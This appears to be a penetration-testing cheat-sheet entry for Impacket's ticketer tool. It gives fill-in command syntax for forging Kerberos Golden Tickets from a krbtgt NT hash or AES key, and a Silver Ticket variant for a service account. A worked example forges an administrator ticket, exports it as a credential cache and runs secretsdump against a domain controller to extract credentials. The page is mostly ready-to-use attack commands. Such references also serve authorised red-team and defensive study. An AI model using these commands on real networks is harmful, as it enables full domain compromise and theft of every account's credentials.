Impacket ticketer.py Golden Ticket
Forge a Golden Ticket (TGT signed with the krbtgt key) granting any user, any privilege, until the krbtgt password is rotated twice. Save the resulting .ccache and export KRB5CCNAME to use it.
- Tool
- impacket-ticketer
- Category
- Credential Attacks / Ticket Forgery & Conversion
- Platform
- linux
- Requires
- NTLM hash
- Protocols
- KERBEROS
Syntax
Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.
impacket-ticketer -nthash <krbtgt-nt-hash> -domain-sid <domain-sid> -domain '<domain>' '<user>'
Credential variants
The same attack using a different authentication material.
AES Key requires AES key
impacket-ticketer -aesKey <aes256-key> -domain-sid <domain-sid> -domain '<domain>' '<user>'
Silver Ticket (Service) requires NTLM hash
impacket-ticketer -nthash <service-nt-hash> -domain-sid <domain-sid> -domain '<domain>' -spn '<spn>' '<user>'
Examples
impacket-ticketer -nthash aad3b...e0c089c0 -domain-sid S-1-5-21-... -domain corp.local administrator
export KRB5CCNAME=$(pwd)/administrator.ccache
impacket-secretsdump -k -no-pass corp.local/administrator@dc.corp.local
Tags
References
Related commands
- Impacket describeTicket Parse and display the contents of a Kerberos ticket (.ccache or .kirbi)
- Impacket Diamond Ticket Forge a Diamond Ticket: request a legitimate TGT from the KDC and then patch its PAC…
- Impacket getPac Retrieve the PAC (Privilege Attribute Certificate) for a target user via the S4U2self…
- Impacket Golden Ticket Forge a Golden Ticket (TGT) using the krbtgt NTLM hash
- Impacket Silver Ticket Forge a Silver Ticket (TGS) for a specific service using its NTLM hash
- Impacket Ticket Converter Convert Kerberos tickets between kirbi (Windows) and ccache (Linux) formats